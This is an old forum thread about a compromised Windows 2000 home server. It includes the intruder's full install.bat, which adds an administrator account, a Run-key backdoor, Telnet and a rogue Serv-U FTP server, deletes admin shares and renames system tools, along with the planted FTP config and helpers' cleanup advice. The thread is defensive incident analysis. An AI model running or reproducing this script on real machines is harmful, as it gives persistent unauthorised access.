Hacked !!!!!!

Thread: Hacked !!!!!!

  1. #1
    Senior Member
    Join Date
    Aug 2001
    Posts
    136

    Hacked !!!!!!

    Hey guys. KapperDog here. Some of you may remember me. I've been a member here for a few years and I read more than I post.

    Need a favor, please

    I am playing with a web server I set up on my home PC. It runs Win2KPro, Savant Web Server and BulletProof FTP.

    The FTP was not running at the time of the hack but Savant was.

    I'm not sure if I caught him in progress or if he just left a clue behind by accident but, this morning when I checked the box, it had a CMD window open and this is what was in the box.

    Sure looks like I was hacked to me. LOL

    Can anyone tell me what damage was done and (most importantly) am I still compromised.

    Thanks for everything.

    Hey, where's Hogfly? How's his gas? LMAO

    Anyway......

    Code:
    C:\WINNT\system32\spool\prtprocs\w32x86>set  key=1
    
    C:\WINNT\system32\spool\prtprocs\w32x86>ver   | find "2000"   1>nul
    
    C:\WINNT\system32\spool\prtprocs\w32x86>if not errorlevel 1 set key=2
    
    C:\WINNT\system32\spool\prtprocs\w32x86>c:
    
    C:\WINNT\system32\spool\prtprocs\w32x86>attrib -s -h -r c:\winnt\system32\spool\
    prtprocs\w32x86\svchost.exe
    
    C:\WINNT\system32\spool\prtprocs\w32x86>attrib -s -h -r c:\winnt\system32\spool\
    prtprocs\w32x86\servudaemon.ini
    
    C:\WINNT\system32\spool\prtprocs\w32x86>attrib -s -h -r c:\winnt\system32\spool\
    prtprocs\w32x86\install.bat
    
    C:\WINNT\system32\spool\prtprocs\w32x86>attrib -s -h -r c:\winnt\system32\spool\
    prtprocs\w32x86\dump0n.txt
    
    C:\WINNT\system32\spool\prtprocs\w32x86>attrib -s -h -r c:\winnt\system32\spool\
    prtprocs\w32x86\ohq.exe
    
    C:\WINNT\system32\spool\prtprocs\w32x86>attrib -s -h -r c:\winnt\system32\spool\
    prtprocs\w32x86\JAsfv.dll
    
    C:\WINNT\system32\spool\prtprocs\w32x86>attrib -s -h -r c:\winnt\system32\spool\
    prtprocs\w32x86\JAsfv.ini
    
    C:\WINNT\system32\spool\prtprocs\w32x86>attrib -s -h -r c:\winnt\system32\spool\
    prtprocs\w32x86\TzoLibr.dll
    
    C:\WINNT\system32\spool\prtprocs\w32x86>net user GLoB peupo3nn/add  /yes
    The user name could not be found.
    
    More help is available by typing NET HELPMSG 2221.
    
    
    C:\WINNT\system32\spool\prtprocs\w32x86>net LOCALGROUP administrators GLoB /add
    
    There is no such global user or group: GLoB.
    
    More help is available by typing NET HELPMSG 3783.
    
    
    C:\WINNT\system32\spool\prtprocs\w32x86>net group "Domain Admins" GLoB /add
    This command can be used only on a Windows 2000 Domain Controller.
    
    More help is available by typing NET HELPMSG 3515.
    
    
    C:\WINNT\system32\spool\prtprocs\w32x86>echo REGEDIT4     1>>ins.reg
    
    C:\WINNT\system32\spool\prtprocs\w32x86>echo [HKEY_LOCAL_MACHINE\SOFTWARE\Micros
    oft\Windows\CurrentVersion\Run] 1>>ins.reg
    
    C:\WINNT\system32\spool\prtprocs\w32x86>echo  "MDM"="c:\winnt\system32\spool\prt
    procs\w32x86\svchost.exe" 1>>ins.reg
    
    C:\WINNT\system32\spool\prtprocs\w32x86>echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentC
    ontrolSet\Control\Lsa\]    1>>ins.reg
    
    C:\WINNT\system32\spool\prtprocs\w32x86>echo "restrictanonymous"=dword:00000002
       1>>ins.reg
    
    C:\WINNT\system32\spool\prtprocs\w32x86>echo [HKEY_LOCAL_MACHINE\SOFTWARE\Micros
    oft\TelnetServer\1.0\]  1>>ins.reg
    
    C:\WINNT\system32\spool\prtprocs\w32x86>echo "NTLM"=dword:00000001    1>>ins.reg
    
    
    C:\WINNT\system32\spool\prtprocs\w32x86>echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlS
    et001\Services\TlntSvr\]    1>>ins.reg
    
    C:\WINNT\system32\spool\prtprocs\w32x86>echo "Start"=dword:00000002    1>>ins.re
    g
    
    C:\WINNT\system32\spool\prtprocs\w32x86>echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentC
    ontrolSet\Services\LanmanServer\Parameters] 1>>ins.reg
    
    C:\WINNT\system32\spool\prtprocs\w32x86>echo "AutoShareServer"=dword:00000000
    1>>ins.reg
    
    C:\WINNT\system32\spool\prtprocs\w32x86>echo "AutoShareWks"=dword:00000000   1>>
    ins.reg
    
    C:\WINNT\system32\spool\prtprocs\w32x86>echo [HKEY_LOCAL_MACHINE\SOFTWARE\Micros
    oft\Windows NT\CurrentVersion\Winlogon] 1>>ins.reg
    
    C:\WINNT\system32\spool\prtprocs\w32x86>echo "DontDisplayLastUserName"=dword:000
    00001   1>>ins.reg
    
    C:\WINNT\system32\spool\prtprocs\w32x86>echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentC
    ontrolSet\Services\lanmanserver\parameters]   1>>ins.reg
    
    C:\WINNT\system32\spool\prtprocs\w32x86>echo "RestrictNullSessAccess"=dword:0000
    0001   1>>ins.reg
    
    C:\WINNT\system32\spool\prtprocs\w32x86>regedit /S ins.reg
    
    C:\WINNT\system32\spool\prtprocs\w32x86>del ins.reg
    
    C:\WINNT\system32\spool\prtprocs\w32x86>svchost.exe /i
    
    C:\WINNT\system32\spool\prtprocs\w32x86>net stop Serv-U
    The Serv-U FTP Server service is not started.
    
    More help is available by typing NET HELPMSG 3521.
    
    
    C:\WINNT\system32\spool\prtprocs\w32x86>net start Serv-U
    The Serv-U FTP Server service is starting.
    The Serv-U FTP Server service was started successfully.
    
    
    C:\WINNT\system32\spool\prtprocs\w32x86>net stop tlntsvr
    The Telnet service is not started.
    
    More help is available by typing NET HELPMSG 3521.
    
    
    C:\WINNT\system32\spool\prtprocs\w32x86>net start tlntsvr
    The Telnet service is starting.
    The Telnet service was started successfully.
    
    
    C:\WINNT\system32\spool\prtprocs\w32x86>net stop "messenger"
    The Messenger service is not started.
    
    More help is available by typing NET HELPMSG 3521.
    
    
    C:\WINNT\system32\spool\prtprocs\w32x86>net stop "netbios"
    
    The NetBIOS Interface service was stopped successfully.
    
    
    C:\WINNT\system32\spool\prtprocs\w32x86>net share /delete C$ /y
    C$ was deleted successfully.
    
    
    C:\WINNT\system32\spool\prtprocs\w32x86>net share /delete D$ /y
    This shared resource does not exist.
    
    More help is available by typing NET HELPMSG 2310.
    
    
    C:\WINNT\system32\spool\prtprocs\w32x86>net share /delete E$ /y
    This shared resource does not exist.
    
    More help is available by typing NET HELPMSG 2310.
    
    
    C:\WINNT\system32\spool\prtprocs\w32x86>net share /delete F$ /y
    This shared resource does not exist.
    
    More help is available by typing NET HELPMSG 2310.
    
    
    C:\WINNT\system32\spool\prtprocs\w32x86>net share /delete ADMIN$
    Users have open files on ADMIN$.  Continuing the operation will force the files
    closed.
    
    Do you want to continue this operation? (Y/N) [N]:
    The cursor is still flashing at this prompt waiting for a reply.

    Any advice?

    Thanks again, guys.
    KapperDog

  2. #2
    AO Ancient: Team Leader
    Join Date
    Oct 2002
    Posts
    5,197
    well......

    Busy little ratbag wasn't he......<s>

    Unfortunately you don't seem to have all the activity..... The command history buffer must have begun to overwrite itself..... You do have a few clues though that may help you clean up without a complete format and reinstall.

    His password for this hack is peupo3nn

    much info and stuff he did is in C:\WINNT\system32\spool\prtprocs\w32x86

    There is a batch file in the w32x86 dir called install.bat that is worth looking through.....

    There is a txt file called Dump0n.txt that is also worth a close look.

    servudaemon.ini might also show some interesting info as would JAsfv.ini

    You have a definitive list of the registry changes he made....Undo them

    close the services he started

    dunno why he would stop netbios..... That's an odd one.....

    He deleted your administrative shares.... you should probably leave them deleted unless you use them.

    It's up to you if you simply delete the files he put in C:\WINNT\system32\spool\prtprocs\w32x86 or just keep them on a floppy to experiment with.

    I'd also put a packet sniffer watching the machine for a few days
    Don't SYN us.... We'll SYN you.....
    "A nation that draws too broad a difference between its scholars and its warriors will have its thinking done by cowards, and its fighting done by fools." - Thucydides

  3. #3
    Senior Member
    Join Date
    Aug 2001
    Posts
    136
    Well, it definitely looks like a real hack. It looks like he installed ServU ftp on my box.

    This is the first time I've been hacked. Kinda fun. hehe

    Although, I want to make sure my entire LAN is not in danger. It would appear he intends to return and steal, not just destroy. (Otherwise, I assume I would have formatted HDDs by now.)

    Hmmmmm? maybe, I should lay in wait. LOL Unfortunately, I don't know as much as I should about this stuff.

    Anyway, I hope you don't mind my multiple posts but, I'm going to post what I find as I find it. If someone wants to pick up and help out, I sure would be grateful. Thanks again.

    Here is the servUDaemon.ini from the Serv-U FTP install

    Code:
    [GLOBAL]
    Version=3.0.0.17
    RegistrationKey=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAawEEBDOq4z0PJw8nAgAERHVtcAhQdWJAU3RybwdFQ0xpUFNF
    ProcessID=596
    MaxNrUsers=10
    CheckAnonPass=1
    DirCacheEnable=0
    AntiHammer=1
    AntiHammerTries=10
    AntiHammerBlock=1800
    PacketTimeOut=300
    [EXTERNAL]
    EventHookDLL1=JAsfv.dll
    [DOMAINS]
    Domain1=0.0.0.0||6969|0nlineHQ|1
    [Domain1]
    ReplyHello=(¯`·._.·[ 0nline.HQ ]·._.·´¯)
    ReplyHelp=(¯`·._.·[ No Help avering ]·._.·´¯)
    ReplyNoAnon=(¯`·._.·[ No an0nym0us acc0unt ]·._.·´¯)
    ReplyNoCredit=(¯`·._.·[ No en0ught Credits ]·._.·´¯)
    ReplySYST=(¯`·._.·[ Hax0r = 0nline.HQ CreW ]·._.·´¯)
    ReplyTooMany=(¯`·._.·[ 421: ToO MuCh LeeCheRz / BaCk s00n ]·._.·´¯)
    ReplyDown=(¯`·._.·[ Offline : BaCk s00n ]·._.·´¯)
    ReplyOffline=(¯`·._.·[ Offline : BaCk s00n ]·._.·´¯)
    LogSystemMes=0
    LogSecurityMes=0
    LogGETs=0
    LogPUTs=0
    MaxNrUsers=10
    User1=admin|1|0
    SignOn=c:\winnt\system32\spool\prtprocs\w32x86\dump0n.txt
    User2=fxp|1|0
    User3=leech|1|0
    [USER=admin|1]
    Password=vv3C067E6E3AD1C12C6D5CF9BE14CD5B19
    HomeDir=c:\
    AlwaysAllowLogin=1
    TimeOut=1000020
    Maintenance=System
    Access1=c:\|RWAMELCDP
    Access1=c:\|RWAMELCDP
    Access2=d:\|RWAMELCDP
    Access3=e:\|RWAMELCDP
    Access4=f:\|RWAMELCDP
    Access5=g:\|RWAMELCDP
    Access6=h:\|RWAMELCDP
    Access7=i:\|RWAMELCDP
    Access8=j:\|RWAMELCDP
    Access9=k:\|RWAMELCDP
    Access10=l:\|RWAMELCDP
    Access11=m:\|RWAMELCDP
    Access12=n:\|RWAMELCDP
    Access13=o:\|RWAMELCDP
    Access14=p:\|RWAMELCDP
    Access15=q:\|RWAMELCDP
    Access16=r:\|RWAMELCDP
    Access17=s:\|RWAMELCDP
    Access18=t:\|RWAMELCDP
    Access19=u:\|RWAMELCDP
    Access20=v:\|RWAMELCDP
    Access21=w:\|RWAMELCDP
    Access22=x:\|RWAMELCDP
    Access23=y:\|RWAMELCDP
    Access24=z:\|RWAMELCDP
    [USER=fxp|1]
    Password=rjAF7C43174907EE9645895D981D10A046
    HomeDir=c:\winnt\system32\spool\prtprocs\w32x86\stro
    RelPaths=1
    TimeOut=600
    Access1=c:\winnt\system32\spool\prtprocs\w32x86\stro|RWAMLCDP
    [USER=leech|1]
    Password=khD56952C34B3B066BF0F400BD3D0B2B97
    HomeDir=c:\winnt\system32\spool\prtprocs\w32x86\stro
    RelPaths=1
    TimeOut=600
    Access1=c:\winnt\system32\spool\prtprocs\w32x86\stro|RLP
    Thanks Tiger. I was looking thru that directory while you were posting. Lottsa neat stuff.

    Most interesting is the install.bat file.

    So far, all I have done is rename all .exe's and .bat's to .bakexe and .bakbat.

    I don't want to delete anything because this is a real opportunity for me to learn but, I'm afraid. LOL

    I guess, the 1 thing I should focus on first is how he got in and how to stop him (and others) from returning the same way.

    Any suggestions on this? Remember, I'm a newbie. LOL

    I have 10 boxes on this LAN and I don't want to lose all 10 of them. LOL

    Hmmm, I may be in more trouble than I thought. Well, we shall see.

    Anyway, the install.bat

    C:\WINNT\system32\spool\prtprocs\w32x86

    Code:
    set  key=1 
    ver | find "2000" > nul 
    if not errorlevel 1 set key=2
    c:
    attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\svchost.exe
    attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\servudaemon.ini
    attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\install.bat
    attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\dump0n.txt
    attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\ohq.exe
    attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\JAsfv.dll
    attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\JAsfv.ini
    attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\TzoLibr.dll
    
    net user GLoB peupo3nn/add  /yes
    net LOCALGROUP administrators GLoB /add 
    net group "Domain Admins" GLoB /add
    
    echo REGEDIT4  1>>ins.reg  
    echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>>ins.reg
    echo  "MDM"="c:\winnt\system32\spool\prtprocs\w32x86\svchost.exe">>ins.reg
    echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\] >> ins.reg  
    echo "restrictanonymous"=dword:0000000%key% >> ins.reg  
    echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0\] >> ins.reg
    echo "NTLM"=dword:00000001 >> ins.reg  
    echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TlntSvr\] >> ins.reg  
    echo "Start"=dword:00000002 >> ins.reg  
    echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]>> ins.reg
    echo "AutoShareServer"=dword:00000000>> ins.reg  
    echo "AutoShareWks"=dword:00000000>> ins.reg  
    echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]>> ins.reg
    echo "DontDisplayLastUserName"=dword:00000001>> ins.reg  
    echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]>> ins.reg  
    echo "RestrictNullSessAccess"=dword:00000001>> ins.reg  
    
    regedit /S ins.reg
    del ins.reg
    svchost.exe /i
    net stop Serv-U
    net start Serv-U
    net stop tlntsvr
    net start tlntsvr
    net stop "messenger" 
    net stop "netbios" 
    net share /delete C$ /y 
    net share /delete D$ /y 
    net share /delete E$ /y 
    net share /delete F$ /y 
    net share /delete ADMIN$ 
    net share /delete IPC$ 
    
    net stop "Remote Registry Service" 
    net stop "Computer Browser" 
    net stop "REMOTE PROCEDURE CALL" 
    net stop "REMOTE PROCEDURE CALL SERVICE" 
    net stop "Remote Access Connection Manager" 
    net stop "telnet" 
    mkdir c:\winnt\Recycled\.glob
    cd c:\winnt\system32\
    ren net.exe neo.exe
    ren tftp.exe neo2.exe
    ren ftp.exe neo3.exe
    ren at.exe neo4.exe
    c:\winnt\system32\spool\prtprocs\w32x86\.glob\svchost.exe /u /h
    KapperDog
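Tiger Shark's advice in post #2 boils down to a checklist: undo the registry changes, stop the services the script started, and account for the files it hid and the binaries it renamed. As an added example (not part of the thread and not a tool either poster ran), the Python below parses the install.bat posted above, rebuilds the ins.reg file its echo redirections write (resolving %key% the way the `ver | find "2000"` test does on Windows 2000, which is why the transcript in the first post shows dword:00000002), and turns the result into a defender's to-do list. INSTALL_BAT is an abridged copy of the script from this thread; the parser, the lowercased registry key names and the checklist wording are this example's own. Note that the transcript shows the `net user ... /add` line failing ("The user name could not be found"), so the account item is something to verify rather than assume.

```python
"""Triage helper for the install.bat posted above.  Added example, not a tool
the posters used: it parses the batch script, rebuilds the ins.reg that its
echo redirections write, and lists what a defender has to undo.  INSTALL_BAT is
an abridged copy of the script from the thread; the parsing logic is new."""
import re
from typing import Dict, List

INSTALL_BAT = r"""
set  key=1
ver | find "2000" > nul
if not errorlevel 1 set key=2
attrib -s -h -r c:\winnt\system32\spool\prtprocs\w32x86\svchost.exe
net user GLoB peupo3nn/add  /yes
echo REGEDIT4  1>>ins.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>>ins.reg
echo  "MDM"="c:\winnt\system32\spool\prtprocs\w32x86\svchost.exe">>ins.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\] >> ins.reg
echo "restrictanonymous"=dword:0000000%key% >> ins.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]>> ins.reg
echo "AutoShareServer"=dword:00000000>> ins.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]>> ins.reg
echo "RestrictNullSessAccess"=dword:00000001>> ins.reg
regedit /S ins.reg
del ins.reg
net start Serv-U
net start tlntsvr
net stop "netbios"
net share /delete C$ /y
ren net.exe neo.exe
"""

def _lines(batch: str) -> List[str]:
    return [ln.strip() for ln in batch.splitlines() if ln.strip()]

def batch_variables(batch: str, windows_2000: bool = True) -> Dict[str, str]:
    # The script's only variable: `ver | find "2000"` succeeds on Windows 2000,
    # so the guarded `set key=2` fires there (post #1's transcript shows key=2).
    variables: Dict[str, str] = {}
    for ln in _lines(batch):
        m = re.match(r"(?i)^(if\s+not\s+errorlevel\s+1\s+)?set\s+(\w+)=(\S+)$", ln)
        if m and (not m.group(1) or windows_2000):
            variables[m.group(2)] = m.group(3)
    return variables

def reconstruct_reg(batch: str, variables: Dict[str, str]) -> str:
    out: List[str] = []
    for ln in _lines(batch):
        m = re.match(r"(?i)^echo\s+(.*)>>\s*ins\.reg$", ln)
        if m:
            # cmd reads a lone digit before ">>" as a handle ("REGEDIT4  1>>");
            # a digit glued to the value ("...00000001>>") stays part of it.
            body = re.sub(r"\s\d$", "", m.group(1)).strip()
            out.append(re.sub(r"%(\w+)%", lambda v: variables.get(v.group(1), v.group(0)), body))
    return "\n".join(out) + "\n"

def parse_reg(reg_text: str) -> Dict[str, Dict[str, str]]:
    keys: Dict[str, Dict[str, str]] = {}
    current = None
    for ln in map(str.strip, reg_text.splitlines()):
        if ln.startswith("[") and ln.endswith("]"):
            current = ln[1:-1].rstrip("\\").lower()  # registry paths are case-insensitive
            keys.setdefault(current, {})
        elif ln.startswith('"') and current is not None:
            name, _, value = ln.partition("=")
            keys[current][name.strip('"')] = value.strip().strip('"')
    return keys

def summarize(batch: str, variables: Dict[str, str]) -> dict:
    s: dict = {k: [] for k in ("hidden_files", "accounts_added", "services_started",
                              "services_stopped", "shares_deleted", "renamed_binaries")}
    s["registry"] = parse_reg(reconstruct_reg(batch, variables))
    for ln in _lines(batch):
        if m := re.match(r"(?i)^attrib\s+(?:-[shr]\s+)+(\S+)$", ln):
            s["hidden_files"].append(m.group(1))
        elif m := re.match(r"(?i)^net\s+user\s+(\S+)\s+\S*?/add", ln):
            s["accounts_added"].append(m.group(1))
        elif m := re.match(r'(?i)^net\s+(start|stop)\s+("[^"]+"|\S+)', ln):
            s[{"start": "services_started", "stop": "services_stopped"}[m.group(1).lower()]].append(m.group(2).strip('"'))
        elif m := re.match(r"(?i)^net\s+share\s+/delete\s+(\S+)", ln):
            s["shares_deleted"].append(m.group(1))
        elif m := re.match(r"(?i)^ren\s+(\S+)\s+(\S+)$", ln):
            s["renamed_binaries"].append((m.group(1), m.group(2)))
    return s

def remediation_checklist(s: dict) -> List[str]:
    run_key = r"hkey_local_machine\software\microsoft\windows\currentversion\run"
    items = [f"verify account {u} does not exist; net user {u} /delete if it does" for u in s["accounts_added"]]
    items += [f"remove Run value {n} -> {p}, then quarantine that file" for n, p in s["registry"].get(run_key, {}).items()]
    items += [f"stop and disable service {svc}" for svc in dict.fromkeys(s["services_started"])]
    items += [f"copy off-box, then remove hidden file {p}" for p in s["hidden_files"]]
    items += [f"restore {o} (renamed to {a}); compare its hash with install media" for o, a in s["renamed_binaries"]]
    items += [f"admin share {sh} was deleted; recreate only if you rely on it" for sh in s["shares_deleted"]]
    return items

if __name__ == "__main__":
    print("\n".join(remediation_checklist(summarize(INSTALL_BAT, batch_variables(INSTALL_BAT)))))
```

Run as a script it prints the checklist; the two lanmanserver sections the script writes with different capitalisation land in one key, as they would in the registry, so both AutoShareServer and RestrictNullSessAccess show up under one path.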

  4. #4
    AO Ancient: Team Leader
    Join Date
    Oct 2002
    Posts
    5,197
    I've heard of the HQ CreW somewhere before..... I just can't remember where......
    Don't SYN us.... We'll SYN you.....
    "A nation that draws too broad a difference between its scholars and its warriors will have its thinking done by cowards, and its fighting done by fools." - Thucydides

  5. #5
    Senior Member
    Join Date
    Aug 2001
    Posts
    136
    Code:
    C:\WINNT\system32\spool\prtprocs\w32x86 
    
     Directory of C:\WINNT\system32\spool\prtprocs\w32x86
    
    02/17/2003  11:23p      <DIR>          .
    02/17/2003  11:23p      <DIR>          ..
    02/02/2003  03:44p               1,685 dump0n.txt
    02/07/2003  07:54p               2,541 install.bakbat
    01/16/2002  08:07p              69,632 JAsfv.dll
    02/06/2003  08:24p               2,739 JAsfv.ini
    02/07/2003  02:16p             632,809 ohq.bakexe
    02/17/2003  03:53p               2,091 ServUDaemon.ini
    02/17/2003  03:44p                 584 ServUStartUpLog.txt
    12/07/1999  07:00a               6,928 sfmpsprt.dll
    02/17/2003  03:54p      <DIR>          stro
    02/04/2003  08:45p           1,930,752 svchost.bakexe
    10/16/2002  09:07p              36,864 TzoLibr.dll
                  10 File(s)      2,686,625 bytes
                   3 Dir(s)  108,350,550,016 bytes free
    
    C:\WINNT\system32\spool\prtprocs\w32x86>
    dumpOn.txt

    Code:
    
    ¨¨°o.O0Oo+====================================+oO0O.o°¨¨
              
                       <-·´¯`·._.·´¯) Info Utilisateur (¯`·._.·´¯`·->
    
    --={ Tu es sur le disque %Disk
    --={ Ton ip %IP 
    --={ Utilisateurs Connectés:                %UNow
    --={ Nombre d'utilisateurs Acceptés:  %MaxUsers
    --={ Nombre d'utilisateurs connectés depuis le lancement du serveur: %UAll
    --={ Utilisateurs connectés sur le serveur durant les dernieres 24H:      %U24h
    
    ¨¨°o.O0Oo+====================================+oO0O.o°¨¨
    
                       <-·´¯`·._.·´¯) Descriptif Serveur (¯`·._.·´¯`·->
    
    --={ Heure Local  %Time
    --={ Date Local    %Date 
    --={ Le serveur est lancé depuis 
    --={ %ServerDays Jours, %ServerHours Heures, %ServerMins Mins, %ServerSecs Secs
    
    ¨¨°o.O0Oo+====================================+oO0O.o°¨¨
    
                       <-·´¯`·._.·´¯) Statistique Serveur (¯`·._.·´¯`·->
    
    --={ Espace Disque Disponible:         %DFree Ko
    --={ Téléchargement Total:                         %ServerKbDown Ko 
    --={ Envoie Total:                                          %ServerKbUp Ko
    --={ Bande Passante Moyenne:             %ServerAvg Ko/sec
    --={ Bande Passante Actuelle:              %ServerKBps Ko/sec
    --={ Nombres de Fichiés Téléchargés:          %FDown
    --={ Nombres de Fichiés Envoyés:                %FUp
    
    ¨¨°o.O0Oo+====================================+oO0O.o°¨¨
    
                       <-·´¯`·._.·´¯) Ratio Stat Serveur (¯`·._.·´¯`·->
    
    --={ Ratio Up :         %RatioUp Ko
    --={ Ratio Down :                         %RatioDown  Ko 
    --={ Credits restant:                                         %RatioCredit
    
    ¨¨°o.O0Oo+====================================+oO0O.o°¨¨
    KapperDog

  6. #6
    AO Ancient: Team Leader
    Join Date
    Oct 2002
    Posts
    5,197
    Kapper: Ya know what's funny....... I was looking at the first printout you posted and thinking to myself "this is scripted".... LOL..... Now I see the install bat it's the exact set of commands in the same order so this was the install bat running.

    You are right.... We need to find the way in.... What is the architecture of the network.... like

    Internet -> Firewall -> LAN
    |
    v
    DMZ -> Public services

    I need to understand where your vulnerabilities are since clearly he had already copied all the files into place and the install bat prior to him running it and there is no evidence of how or where..... What services are available publicly? Kinda everything you can tell me?

    If you don't feel comfy doing it that publicly....pm me with the info.
    Don't SYN us.... We'll SYN you.....
    "A nation that draws too broad a difference between its scholars and its warriors will have its thinking done by cowards, and its fighting done by fools." - Thucydides

  7. #7
    Since he started an FTP service his plan is probably to use your box as some sort of warez server.
    I would go with the intrusion detection, packet capturing software.
    BTW do you have timestamps for when this happened ?
    Do you run a firewall ? (You should)
    If you run a firewall you may want to examine the logs. This could give you some info on the whereabouts of the mischief but he is probably proxy-chained.
    Also the telnet service gets started. He might have continued his quest from telnet and forgot to terminate the command session.

    Try disconnecting the other puters on your network if it is possible and monitor the traffic. This way maybe you can catch him while he is at it.

    Just some general advice:
    I googled for 'savant webserver' without the quotes and immediately got at least ten links to vulnerabilities in it.
    Are you aware of this ?
    Do you have the latest patches installed ?

    Hope this will help.
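The question about timestamps is answered, at least for the drop directory, by the dir listing in post #5. As an added example (not something the posters ran), the Python below parses that listing as Windows 2000 dir prints it, checks the parsed entries against the File(s)/Dir(s) totals (a listing pasted by hand can lose a line), and reports the last-write window so the times can be matched against the Savant, router and firewall logs. DIR_LISTING is copied from post #5; the parser, the Entry type and the ignore set are this example's own. One caveat the output makes visible: JAsfv.dll and TzoLibr.dll carry 2002 dates while everything else is February 2003, and a copied file can keep its source's last-write time, so the earliest stamp is not necessarily the intrusion date.

```python
"""Last-write timeline from the dir listing in post #5.  Added example, not a
tool the posters used; DIR_LISTING is copied from the thread, the rest is new."""
import re
from datetime import datetime
from typing import Dict, List, NamedTuple, Optional, Tuple

DIR_LISTING = r"""
 Directory of C:\WINNT\system32\spool\prtprocs\w32x86

02/17/2003  11:23p      <DIR>          .
02/17/2003  11:23p      <DIR>          ..
02/02/2003  03:44p               1,685 dump0n.txt
02/07/2003  07:54p               2,541 install.bakbat
01/16/2002  08:07p              69,632 JAsfv.dll
02/06/2003  08:24p               2,739 JAsfv.ini
02/07/2003  02:16p             632,809 ohq.bakexe
02/17/2003  03:53p               2,091 ServUDaemon.ini
02/17/2003  03:44p                 584 ServUStartUpLog.txt
12/07/1999  07:00a               6,928 sfmpsprt.dll
02/17/2003  03:54p      <DIR>          stro
02/04/2003  08:45p           1,930,752 svchost.bakexe
10/16/2002  09:07p              36,864 TzoLibr.dll
              10 File(s)      2,686,625 bytes
               3 Dir(s)  108,350,550,016 bytes free
"""

class Entry(NamedTuple):
    mtime: datetime      # last-write time as dir shows it (minute resolution)
    is_dir: bool
    size: int
    name: str

ENTRY_RE = re.compile(r"^(\d{2}/\d{2}/\d{4})\s+(\d{2}:\d{2})([ap])\s+(?:(<DIR>)|([\d,]+))\s+(.+?)\s*$")
SUMMARY_RE = re.compile(r"^\s*(\d+)\s+(File|Dir)\(s\)\s+([\d,]+)\s+bytes")

def parse_dir_listing(text: str) -> Tuple[List[Entry], Dict[str, int]]:
    entries: List[Entry] = []
    summary: Dict[str, int] = {}
    for line in text.splitlines():
        if m := ENTRY_RE.match(line):
            date, clock, ampm, is_dir, size, name = m.groups()
            stamp = datetime.strptime(f"{date} {clock}{'AM' if ampm == 'a' else 'PM'}",
                                      "%m/%d/%Y %I:%M%p")
            entries.append(Entry(stamp, is_dir is not None,
                                 0 if is_dir else int(size.replace(",", "")), name))
        elif m := SUMMARY_RE.match(line):
            summary[m.group(2)] = int(m.group(1))
            if m.group(2) == "File":
                summary["bytes"] = int(m.group(3).replace(",", ""))
    return entries, summary

def consistent_with_summary(entries: List[Entry], summary: Dict[str, int]) -> bool:
    # dir's own totals catch lines lost when a listing is pasted by hand.
    files = [e for e in entries if not e.is_dir]
    return (len(files) == summary.get("File")
            and len(entries) - len(files) == summary.get("Dir")
            and sum(e.size for e in files) == summary.get("bytes"))

def timeline(entries: List[Entry]) -> List[Entry]:
    return sorted(entries, key=lambda e: e.mtime)   # stable: ties keep dir order

def activity_window(entries: List[Entry], ignore=frozenset({".", ".."})) -> Optional[Tuple[datetime, datetime]]:
    # "." and ".." carry the directory's own last change (renaming files in it,
    # as the owner did, updates it), so they are left out by default; pass a
    # larger ignore set to drop known OS files such as sfmpsprt.dll as well.
    stamps = [e.mtime for e in entries if e.name not in ignore]
    return (min(stamps), max(stamps)) if stamps else None

def by_day(entries: List[Entry]) -> Dict[str, List[str]]:
    days: Dict[str, List[str]] = {}
    for e in timeline(entries):
        days.setdefault(e.mtime.strftime("%Y-%m-%d"), []).append(e.name)
    return days

if __name__ == "__main__":
    found, totals = parse_dir_listing(DIR_LISTING)
    print("listing agrees with its own totals:", consistent_with_summary(found, totals))
    for e in timeline(found):
        print(e.mtime, "<DIR>" if e.is_dir else f"{e.size:>9}", e.name)
    print("activity window (excluding . and ..):", activity_window(found))
```

The minute-resolution stamps are all dir gives; for anything finer, or for creation and access times, the volume itself has to be examined rather than a pasted listing.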

  8. #8
    Senior Member
    Join Date
    Aug 2001
    Posts
    136
    I don't have a prob doing it publicly. This is how we all learn to deal with these little kiddies. LOL

    This should be good for me (thanks to you). Hopefully, if we keep it in the forum, others will learn too.

    OK, I'll describe the network as best I can.

    Since we're starting at the beginning, maybe you could give me a little immediate advice.

    Should I shut the server down? It's only hosting a couple ebay auctions and some other fun stuff. It's there for me to play with and learn. I would like to leave it up but if you say, I should take it down, I will.

    The danger is that I have my home network set up to this and, although, there is nothing of interest there, there is archival data that I would not want to lose.

    Does he seem to have access to my entire LAN?

    OK. Thanks.. my turn

    P4 2.4 /512k RAM/Win2KPro/SP2/Savant Web Server

    Cable ISP/Linksys Router (pass not admin)/IP assigned to server and IP placed in DMZ

    Hmmm, I'll bet you're going to slap my wrist for that one. I'll bet I should have done individual port forwarding for the web (80) and the FTP (whatever)

    Well, that's what I've got. If you need more, ask.

    I hope this will be an enjoyable and learning experience for us all and, I want to say thanks in advance for any participation.

